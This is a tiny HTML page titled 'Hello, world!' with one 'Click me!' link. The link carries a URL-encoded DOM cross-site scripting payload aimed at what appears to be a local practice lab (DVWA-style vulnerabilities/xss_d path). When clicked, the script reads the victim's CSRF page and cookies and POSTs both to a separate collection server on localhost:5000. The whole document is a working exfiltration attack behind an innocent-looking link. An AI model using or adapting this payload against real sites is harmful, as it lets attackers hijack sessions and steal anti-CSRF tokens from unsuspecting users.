<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Hello, world!</title>
</head>
<body>

    <a href="http://localhost/vulnerabilities/xss_d/?xdefault=%3Cscript%3Evar%20xhr1=new%20XMLHttpRequest;xhr1.open(%22GET%22,%22http://localhost/vulnerabilities/csrf/%22),xhr1.onload=function(){var%20e=new%20XMLHttpRequest;e.open(%22POST%22,%22http://localhost:5000/dom/%22),e.send(xhr1.response)},xhr1.send();var%20xhr3=new%20XMLHttpRequest;xhr3.open(%22POST%22,%22http://localhost:5000/cookies/%22),xhr3.send(document.cookie);%3C/script%3E">Click me!</a>

</body>
</html>
